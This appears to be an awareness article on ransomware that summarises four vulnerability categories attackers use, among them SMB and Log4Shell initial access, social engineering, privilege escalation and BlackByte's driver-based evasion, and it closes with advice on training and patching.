In 2023, there are two organization groups: those having been attacked by ransomware and those that will shortly be targeted. The current state of cybersecurity resembles an ongoing cyber arms race between ransomware groups and cybersecurity professionals. Experts in cybersecurity have developed the necessary tools and strategies to combat ransomware groups. This cat-and-mouse game is an endless war of attrition with no distinct victor. While in some aspects the situations are probably out of the IT team’s control, there are a number of measures that can be taken to reduce the risks of successful ransomware attacks.
According to research from Securin, hundreds of organizations’ security vulnerabilities are asserted to be exposed. A brief overview of the four most prevalent categories that should be well aware of is listed as follows.
1- Vulnerability allowing intruders to enter the network
According to the research conducted by Securin, external tele services, VPNs, and public apps contain 133 ransomware-related vulnerabilities that can be exploited for initial access.
External tele services including Windows Server Message Block (SMB) and Microsoft Remote Desktop Protocol, since the pandemic’s outbreak and the evolution of work-from-home (WFH), have become more common. Some of them with misconfigurations or popular exploited technology, are easily attacked. For instance, one of the largest ransomware attacks in history, WannaCry in 2017, exploited the SMB vulnerability. In addition to the Log4Shell vulnerability affecting 176 products from 21 vendors and having been exploited by six ransomware groups, including Conti and AvosLocker, there are many other unpatched ones.
2- Vulnerability requiring user’s action
It is noted that “vulnerability” not only relates to software or hardware problems but also to user mistakes. In fact, a significant proportion of ransomware attacks result from this factor. By acting as a friend, colleague, or supervisor of the victim for example, ransomware groups are able to achieve their objectives. Users may inadvertently enter malicious code when accessing email attachments, links, or files. Unfortunately, users become more observant. Now it is the turn of the thief to modify their tools.
The human problem requires human solution response: intensive face-to-face proper training in which IT team members instruct employees from other departments on how to identify potential threats (and what to do if they accidentally allow someone into the system). It is imperative that IT departments stay social-technology-trend-updated and routinely inform the company of what to be cautious.
3- Vulnerability allowing advanced access
The vulnerabilities that have been discussed thus far mention methods hackers attempt to breach into your network. Sadly, it is usually the first step only. Once hackers have exploited vulnerabilities to gain access to your system, they can exploit additional vulnerabilities— those permit privilege escalations—to execute malicious software and take deeper control of the network. In other words, if the hackers have enough understanding of active vulnerabilities in your system, they can approach a restricted account and become an admin whose access to more sensitive data.
According to Securin’s research mentioned above, there are 75 ransomware-related vulnerabilities that could allow ransomware groups to escalate privileges and facilitate movement across organizational domains, including the Privilege Escalation attack of Windows CLFS and Microsoft Exchange Server.
4- Vulnerability allowing stealthy access
Hackers have been employing techniques such as disabling security software or preventing script execution from breaking into vulnerable networks without being detected. Mark-of-the-web bypass (T1553.005), is a typical example that ransomware groups apply to exploit certain file formats and override controls.
Or, BlackByte, a new ransomware group about which the FBI issued a warning last year, according to ZDNet, is famous for a technique “allowing attacks to bypass security products’ detection by exploiting vulnerabilities in more than 1,000 drivers of anti-virus software.” This issue, considered as “Bring your own drivers”, shows a significant and alarming aspect during the war against ransomware attacks.
Ransomware considerably increases and every organization, regardless of field or size, may face such attacks as no system could guarantee to be completely protected. What organizations can do is avoid simple errors through appropriate employee training, a deeper understanding of their systems’ vulnerabilities, and appropriate solutions. The war against ransomware may not end soon, but we can take measures to limit the losses.
According to Cyber Security